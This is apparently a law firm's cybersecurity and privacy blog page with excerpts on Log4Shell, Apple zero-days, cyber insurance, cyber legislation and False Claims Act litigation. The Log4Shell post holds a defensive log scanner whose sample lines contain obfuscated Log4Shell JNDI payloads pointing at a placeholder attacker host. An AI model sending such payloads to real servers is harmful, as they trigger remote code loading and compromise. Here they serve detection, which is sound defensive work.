The Privacy Hacks

Requirements of Cybersecurity Expert Testimony in the Third Circuit


Takeaway: In many data breach cases, a cybersecurity expert may evaluate whether the company’s security measures were reasonable and appropriate or, alternatively, whether the company lacked the requisite technology to detect a breach. In some circumstances, however, a party’s proposed expert may be challenged on the basis of unfair prejudice. Yet, under the Third Circuit’s “generally liberal standard of qualifying experts”, such a challenge was recently overcome by a party whose expert had advanced IT credentials, 20+ years of relevant professional experience, and offered an opinion with probative evidentiary value that outweighed any danger of unfair prejudice.

Key Points: Rule 702 of the Federal Rules of Evidence sets forth the standards for admissible expert testimony. As explained by the Third Circuit Court of Appeals: “Rule 702 has three major requirements: (1) the proffered witness must be an expert, i.e., must be qualified; (2) the expert must testify about matters requiring scientific, technical or specialized knowledge [, i.e., reliability]; and (3) the expert’s testimony must assist the trier of fact [, i.e., fit].”[1]

Regarding the first requirement, qualification, the Third Circuit has stated that it has “a generally liberal standard of qualifying experts.”[2] “Rule 702 requires the witness to have ‘specialized knowledge’ regarding the area of testimony. The basis of this specialized knowledge can be practical experience as well as academic training and credentials.”[3]

When addressing the second requirement, reliability, the Third Circuit has derived from the seminal case of Daubert the following non-exclusive factors for determining reliability: “(1) whether a method consists of a testable hypothesis; (2) whether the method has been subject to peer review; (3) the known or potential rate of error; (4) the existence and maintenance of standards controlling the technique’s operation; (5) whether the method is generally accepted; (6) the relationship of the technique to methods which have been established to be reliable; (7) the qualifications of the expert witness testifying based on the methodology; and (8) the non-judicial uses to which the method has been put.”[4] Read More

Bad Actors Continue to Exploit Log4Shell Vulnerabilities


Takeaway: CISA and CGYBER recommend that all organizations that did not immediately apply the available patches assume Log4Shell compromise and initiate threat-hunting activities.

In December 2021, threat actors began exploiting Log4Shell, a critical vulnerability in the Apache Log4j logging library used throughout enterprise Java software. As part of this exploitation, suspected advanced persistent threat (APT) actors implanted loader malware on compromised systems with embedded executables enabling remote command and control. In one confirmed compromise, these actors were able to move laterally into a disaster recovery network and collect sensitive data. Vendors released patches, and CISA published Malware Analysis Reports MAR-10382580-1 and MAR-10382254-1 detailing the malware recovered from victim systems. But the threat persisted. The Cybersecurity and Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber Command (CGYBER) released a warning in July to network defenders that cyber threat actors continue to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon and Unified Access Gateway (UAG) servers to infiltrate organizations that failed to apply patches. Organizations are encouraged to read MAR-10382254-1, which provides examples of malware samples, including indicators of compromise (IOCs) and detection signatures.

What organizations must do now is: Install fixed builds, updating all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not promptly applied following VMware’s release of updates for Log4Shell in December 2021, treat all affected VMware systems as compromised and hunt for post-exploitation activity rather than simply patching. Minimize the internet-facing attack surface by hosting essential services in a segregated demilitarized zone (DMZ), ensuring strict network perimeter access controls, and deploying regularly updated web application firewalls (WAFs) in front of public-facing services.
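The advisory tells defenders who patched late to hunt for exploitation; one concrete first step is to look for the Log4Shell trigger string in web, proxy and application logs. The scanner below is an added example for this page, not code from CISA, CGYBER, VMware or the article’s author. It handles the obfuscation seen in real traffic that defeats a plain grep for “jndi”: it percent-decodes each line, folds Log4j lookups that evaluate to arbitrary text (${lower:…}, ${upper:…}, ${::-x}, ${env:UNSET:-x}) down to the characters they produce, and then searches for the ${jndi: trigger. The log lines, IP addresses and the host attacker.example are constructed for the demonstration.

```python
"""Hunt for Log4Shell (CVE-2021-44228) exploitation attempts in web-server logs.

Added example for this page; it is not code from CISA, CGYBER or VMware.
Attackers hide the ${jndi:...} trigger behind nested Log4j lookups such as
${lower:j}, ${::-j} and ${env:UNSET:-j}, and behind URL-encoding, so a naive
search for "jndi" misses them. This scanner percent-decodes each line, folds
those lookups to the text they evaluate to, then searches for ${jndi:.
"""
import re
import urllib.parse
from typing import List, Optional

# Constructed sample access-log lines (not from a real incident). The
# addresses, paths and the host "attacker.example" are placeholders.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /portal HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:19 +0000] "GET /portal HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:03:01 +0000] "GET /portal HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}di:ldap://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:14:03:40 +0000] "GET /portal?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:14:04:05 +0000] "GET /portal HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:dns://attacker.example/d}"',
    '10.0.0.7 - - [10/Dec/2021:14:05:00 +0000] "GET /help?q=price%20in%20%24%7Bcurrency%7D HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

# An innermost Log4j lookup: ${...} whose body contains no further "$", "{" or "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# Lookups whose "key:-default" syntax lets an attacker emit arbitrary text
# when the key is unset; folding them to the default exposes the hidden characters.
_DEFAULT_LOOKUPS = {"env", "sys", "date", "java", "main", "ctx", "bundle",
                    "k8s", "docker", "spring", "web", "marker", "log4j"}

_JNDI_TRIGGER = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _fold(body: str) -> Optional[str]:
    """Return the plain text an innermost lookup evaluates to, or None if the
    lookup is not one of the obfuscation forms handled here (it is then kept)."""
    head, sep, rest = body.partition(":")
    if not sep:
        return None
    key = head.lower()
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if key == "" and rest.startswith(":-"):      # ${::-x} evaluates to "x"
        return rest[2:]
    if key in _DEFAULT_LOOKUPS:                   # ${env:UNSET:-x} evaluates to "x"
        _, dsep, default = rest.partition(":-")
        if dsep:
            return default
    return None


def normalize(text: str, max_rounds: int = 16) -> str:
    """Percent-decode (twice, to catch double-encoding) and repeatedly fold
    obfuscation lookups innermost-first until the string stops changing."""
    for _ in range(2):
        text = urllib.parse.unquote(text)
    for _ in range(max_rounds):
        changed = False

        def repl(match: "re.Match[str]") -> str:
            nonlocal changed
            folded = _fold(match.group(1))
            if folded is None:
                return match.group(0)
            changed = True
            return folded

        text = _INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def is_log4shell_attempt(line: str) -> bool:
    """True if the normalized line contains a JNDI lookup trigger."""
    return _JNDI_TRIGGER.search(normalize(line)) is not None


def scan_lines(lines: List[str]) -> List[int]:
    """Return the indices of lines carrying a (possibly obfuscated) trigger."""
    return [i for i, line in enumerate(lines) if is_log4shell_attempt(line)]


if __name__ == "__main__":
    for i in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {i}: {normalize(SAMPLE_LOG_LINES[i])}")
```

A hit shows an exploitation attempt, not a confirmed compromise; on a Horizon or UAG host that was unpatched when the request arrived, treat it as a lead and pivot to outbound LDAP, RMI or DNS connections from the Java service process and to any new processes or scheduled tasks it spawned around that timestamp. The folding rules cover the lookups commonly used for obfuscation but not every Log4j lookup, so keep the normalized output alongside the raw line when reviewing results.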
For the full article and specific examples of Log4Shell threat events, go to: * This blog is available for informational purposes only and is not considered legal advice on any subject matter. By viewing blog posts, the reader understands there is no attorney-client relationship between the reader and the blog publisher. Read More

Decoding the Recent Apple Security Updates


Takeaway: The recent vulnerabilities in Apple software have exemplified the importance of patch management and keeping devices up to date with the latest operating systems and software in order to protect the security of devices.

The recent actively exploited vulnerabilities disclosed by Apple, Inc. (“Apple”) have once again brought global attention to privacy threats caused by security flaws and vulnerabilities.[1] On Wednesday, August 17, 2022, Apple released two emergency updates in response to a zero-day threat, that is, an attack that targets a previously unknown security vulnerability. The updates affected the following products: “iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)” as well as Safari and Mac computers running macOS Monterey.[2] Given that there are over 1.5 billion active Apple products in use worldwide, the vulnerabilities had potentially significant reach.[3]

The vulnerabilities have the CVE IDs CVE-2022-32893 (in WebKit, the browser engine behind Safari) and CVE-2022-32894 (in the kernel). The aim of the Common Vulnerabilities and Exposures (CVE) program is to “identify, define, and catalog publicly disclosed cybersecurity vulnerabilities.”[4] Publishing consistent descriptions of security vulnerabilities allows organizations around the world to coordinate their efforts to prioritize and respond to the vulnerabilities, which maintains the integrity of devices and systems.[5] CVE is sponsored by the Cybersecurity and Infrastructure Security Agency (CISA), a component of the U.S. Department of Homeland Security (DHS).

Apple’s advisory described each issue the same way: “an out-of-bounds write issue was addressed with improved bounds checking.”[6] An out-of-bounds write means the attacker could write data before the beginning or after the end of the intended buffer, which can cause a crash, corruption of data, or code execution.[7] The fix, improved bounds checking, means the code now verifies that an index or length falls within the limits of the array before it is used in a write, instead of trusting a value that an attacker-controlled input could push past the buffer’s end. Read More

What Practices Should a Small Vendor Consider When Applying for Cyber Insurance


Takeaway: As cybersecurity risk increases, large enterprises and government agencies are increasingly requiring smaller vendor companies to obtain cyber insurance to help manage the risk of a data breach. To prepare for an annual cybersecurity insurance renewal or initial application, consider the following practices, which could help address the risks most concerning to an insurer.

Although cybersecurity risk is a persistent concern for lawmakers and regulators, a national regulatory standard in the United States does not appear imminent. If, however, your company has applied for cybersecurity insurance recently, the application process may have seemed like a compliance audit. Cybersecurity insurance questionnaires, as complex as they have become, usually inquire about common practices that most businesses should feel confident investing in and implementing. For the most part, the cybersecurity practices desired by insurance underwriters, in the ever-changing world of cyber risk management, are the same as or similar to the administrative and technical safeguards required under various State and federal security standards. Adopting them ahead of an annual renewal or initial application can address the risks most concerning to an insurer and perhaps even reduce the premium.

Implement a Written Information Security Policy (WISP) and Incident Response Plan (IRP) – The objective of a WISP is to guide the implementation of the technical, administrative, and physical safeguards needed to protect an organization’s data. An IRP helps reduce the impact of a breach by creating a structured and systematic plan of response in the event of an incident affecting an organization’s systems, network, or data, including any data held by outside vendors or service providers. The IRP will also govern contingency plans such as encrypted backups of your IT systems and data, which should be kept offline or otherwise isolated and restored periodically as a test so that recovery actually works when ransomware strikes.

Password Management and Multi-Factor Authentication (MFA) – Anyone accessing a system, network or data should be required to present at least two independent factors (for example, a password plus a hardware token or authenticator app), with MFA enforced as a baseline on remote access, email, and administrative accounts. Read More

Governor Wolf Signs Bill to Aid Pennsylvania State and Local Government in Fighting Cybercrime


Takeaway: Governor Wolf signed a bill that authorizes the governor to order the Pennsylvania National Guard to assist local governments and private entities with cybersecurity support, training, and more.

On July 7, 2022, Governor Wolf approved House Bill 2412, which grants the governor additional powers under Title 51 to order the Pennsylvania National Guard to support State and local government entities with cybersecurity support, training, exercises, and more.[1] This legislation permits the governor to “mobilize our experts through a special state duty status to protect our vital systems and securing personal information.”[2] The two military cybersecurity teams in Pennsylvania primarily subject to the governor’s orders under this bill are the PA Army National Guard Defense Cyber Operations and the PA Air National Guard 112th Cyberspace Operations Squadron.[3] Trained military cybersecurity experts can now support local governments and non-government critical infrastructure entities after those entities submit requests for assistance.[4] State and local governments and designated critical infrastructure can receive operational cybersecurity support. Private and educational institutions can receive training and exercises from the Guard.

During a House Veterans Affairs & Emergency Preparedness Committee meeting in April, a sponsor of this bill and the Cybersecurity Caucus Chair, state Rep. Craig Williams, R-Delaware, said, “We don’t know how many times we’ve been intruded in the cyber space.”[5] Further, Rep. Williams stated, “[Malware] is the leading front of asymmetrical warfare … Part of the effort by Rep. Gaydos and I is to raise awareness about this and try to get some lateral coordination and communication going.”[6]

This new legislation will be particularly beneficial to smaller Pennsylvania local governments without the resources to combat cybercrime independently. With the assistance of the PA National Guard, these government entities can receive actual aid in battling cybercrime and the training necessary to thwart future attacks through educational programs provided by military professionals. Read More

Contractors Beware – Cybersecurity Litigation on the Rise Under the False Claims Act


Takeaway: The DOJ’s Civil Cyber-Fraud Initiative and qui tam actions under the False Claims Act represent significant enforcement mechanisms for contractor cybersecurity compliance.

On the eve of 2022, the United States began imposing new, punitive cybersecurity measures aimed at making the internet a safer platform for businesses to share and use data. As a direct result, contractors working in the defense industrial base are being targeted by the Department of Justice, resulting in a rapid increase of settlements under the False Claims Act. Just a few weeks ago, the Department of Defense issued a memorandum reminding contracting officers of their remedies against contractors that fail to implement NIST SP 800-171 cybersecurity controls. NIST SP 800-171 sets out the security requirements that DoD contractors handling controlled unclassified information must implement and self-assess against. The DoD memorandum urges contracting officers to use available remedies: withholding progress payments, foregoing remaining contract options, and potentially terminating the contract in part or in whole.[1]

The following cases serve as cautionary tales to contractors: if a contractor knowingly fails to comply with material cybersecurity requirements, the contractor could be exposed to liability via qui tam actions under the False Claims Act.[2] The recent Aerojet Rocketdyne settlement is foretelling.[3] Aerojet’s former Senior Director for Cybersecurity filed the Aerojet action as a whistleblower under the False Claims Act; the case settled in April 2022, shortly before trial. The action alleged that Aerojet fraudulently induced the government to contract with the aerospace company by not fully disclosing its non-compliance with DoD cybersecurity requirements. The action sought $19 billion in damages. The evidence showed that Aerojet had communicated with the government about its non-compliance when it sought a waiver of certain requirements. The presiding court, however, found “a genuine dispute of material fact [] as to the sufficiency of the disclosures” and thus denied Aerojet’s motion for summary judgment. The court pointed to evidence that Aerojet had withheld pertinent information about cyber audits conducted by external firms, as well as past security breaches. Read More

Hacking Your Health: Can Your Electronic Health Record be Hacked?


Takeaway: With ransomware attacks increasing over the past few years, healthcare organizations can expect hackers to make ransom demands while holding their computer systems hostage.

Everything comes back in style. In the 90s, computer hackers learned how to infiltrate networks, hold them hostage, and demand payment to make them functional again. Recently, this strategy has resurged in the healthcare industry, potentially placing people’s lives at risk. From 2020 to 2021, the number of ransomware attacks on healthcare organizations skyrocketed by 94%: two-thirds of healthcare organizations in the U.S. experienced some form of ransomware attack in 2021, up from 34% in 2020. According to cybersecurity experts, ransomware attacks on healthcare organizations have long been common; it is the increase in frequency and severity of these attacks that is worrisome.

These attacks can have devastating consequences. Most recently in San Diego, California, treatments at a chemotherapy facility were delayed and, at another healthcare facility, ambulances were diverted from the emergency room after computer systems were frozen by an attack. In 2021, the first lawsuit alleging “death by ransomware” was filed, in which a mother sued a hospital for fatal brain damage to her newborn after heart rate monitors failed because of an attack.

Healthcare facilities are high-profile targets because attackers know the facilities are willing to pay high ransoms to safeguard people’s lives. In fact, 61% of healthcare organizations paid a ransom to resolve a ransomware attack in 2021. Most of these attacks are carried out by private criminal groups. Conti, a crime syndicate out of Russia, was traced back to 30% of ransomware attacks in 2021. And in June, the FBI revealed that it had thwarted an attack from Iran on a children’s hospital in Boston.

As this tactic of the recent past resurfaces, organizations that use or transmit protected health information must ensure that they are prepared. Read More

Italy Becomes Latest Country to Pass Sunshine Act


Takeaway: Although the enactment of the Italian Sunshine Act furthers the global expansion of healthcare transparency, the implied consent provision may not comply with the GDPR.

I. Overview and Requirements of the New Italian Sunshine Act

Law n. 62 of May 31, 2022,[1] or the Italian Sunshine Act, took effect on June 26, 2022. For the first time in Italy, this law requires transparency of “relationships, having economic relevance or advantage, between companies producing drugs, tools, equipment, goods and services, including non-medical ones, and the subjects who operate in the health sector or health care organizations”. The Sunshine Act advances the right to knowledge of economic relationships in the healthcare sector by broadly defining its reach. Article 1 states that the law aims to promote transparency as well as to prevent and fight corruption. Article 5 establishes an online public register, to be activated by the Ministry of Health within six months of the law’s entry into force. Data will be reported and published every six months and will remain publicly available for five years. The Minister of Health will consult with the Agency for Digital Italy, the National Anti-Corruption Authority, and the Italian Data Protection Authority within three months of the law’s entry into force to determine the technical characteristics of the electronic public register and the requirements for transmission of data.

The Italian Sunshine Act requires disclosure of three types of financial arrangements, described in Articles 3 and 4. First, agreements or disbursements of money, goods, services, or other benefits between a manufacturing company and (a) a subject operating in the health sector, when they have a unit value greater than 100 euros or a total annual value greater than 1,000 euros, or (b) a health organization, when they have a unit value greater than 1,000 euros or a total annual value greater than 2,500 euros, must be reported every semester. Read More

Trans-Atlantic Data Privacy Framework: New Data-Sharing Vehicle Is Promising


On March 25, 2022, the United States and the European Commission announced an agreement in principle on the Trans-Atlantic Data Privacy Framework (Framework). This effort is the third of its kind, showcasing the legal complexity involved in creating a mechanism that fosters secure data flows between the United States and the European Union and provides redress for EU individuals whose data is accessed by U.S. government surveillance activities. The Framework promises a vehicle through which companies can share data in ways they could not before, thereby expanding global business. If the Framework operates as promised and intended, a data flow-reliant market worth $7.1 trillion could be supported and encouraged.

Procedural Background

Under the General Data Protection Regulation (GDPR), personal data may be transferred from the European Economic Area (EEA) to a country outside the EEA only where the conditions of Chapter V are met. The European Commission has the authority to determine which countries provide an adequate level of data protection; absent such an adequacy decision, a data controller or processor may transfer personal data only if it provides appropriate safeguards, such as standard contractual clauses, that compensate for the gap in protection. Between the United States and the EU, there have been two previous data-sharing mechanisms designed to provide a relatively easy “self-certification” method for U.S. companies to satisfy this requirement, each of which has been invalidated by the Court of Justice of the European Union (CJEU). In October 2015, the CJEU held that the first mechanism, the Safe Harbor Privacy Principles (Safe Harbor), was invalid in Case C-362/14, Schrems v. Data Protection Commissioner, ECLI:EU:C:2015:650 (Oct. 6, 2015) [hereinafter Schrems I]. In Schrems I, the CJEU found that the Safe Harbor failed to adequately protect the privacy of EU citizens because of the U.S. government’s ability to access personal data for national security purposes. In response to this determination, the United States and EU developed the new EU-U.S. Read More

President Biden Signs Two Cybersecurity Bills into Law


Takeaway: President Biden recently signed into law the “Federal Rotational Cyber Workforce Program Act” and the “State and Local Government Cybersecurity Act”. With these new laws, the Biden Administration is attempting to build a more robust cybersecurity workforce and aid local governments in combating cybercrime.

On June 21, 2022, President Biden signed two bills to combat cybercrime: the “Federal Rotational Cyber Workforce Program Act” and the “State and Local Government Cybersecurity Act.”[1] The Federal Rotational Cyber Workforce Program Act creates a rotational program giving cybersecurity and information technology professionals the opportunity to work in various federal agencies to sharpen their expertise. The Senate passed this bill in 2019, but the House only voted on it this year.[2] The State and Local Government Cybersecurity Act looks to improve coordination between the Department of Homeland Security and local governments when battling cybercrime.[3] This bill requires the National Cybersecurity and Communications Integration Center (NCCIC) to share with states its security tools and protocols for dealing with cybercriminals. Representative Joe Neguse (D-CO), who introduced this bill, stated: “For hackers, state and local governments are an attractive target — we must increase support to these entities so that they can strengthen their systems and better defend themselves from harmful cyber-attacks.”[4] Local governments need help from federal agencies because of the sophistication of modern cyber-attacks. These recently passed bills will aid in creating a more extensive network of well-informed cybercrime fighters and agencies.

[1] S. 1097, Federal Rotational Cyber Workforce Program Act of 2021; S. 2520, State and Local Government Cybersecurity Act of 2021.
[2] Madeline Lauver, US passes bills to foreground national security, Security Magazine, June 23, 2022.
[3] Zach Schonfeld, Biden signs cyber bills into law, The Hill, June 6, 2022, 3:35 pm EDT. Read More

News & Events

Related News

Pietragallo Adds Cybersecurity Lawyer Martin T. Shepherd
October 7, 2021
Martin T. Shepherd, a well-known and respected litigation lawyer, has joined Pietragallo Gordon Alfano Bosick & Raspanti, LLP in the firm’s Commercial Litigation team and as head of the firm’s Diversity Initiative. Read More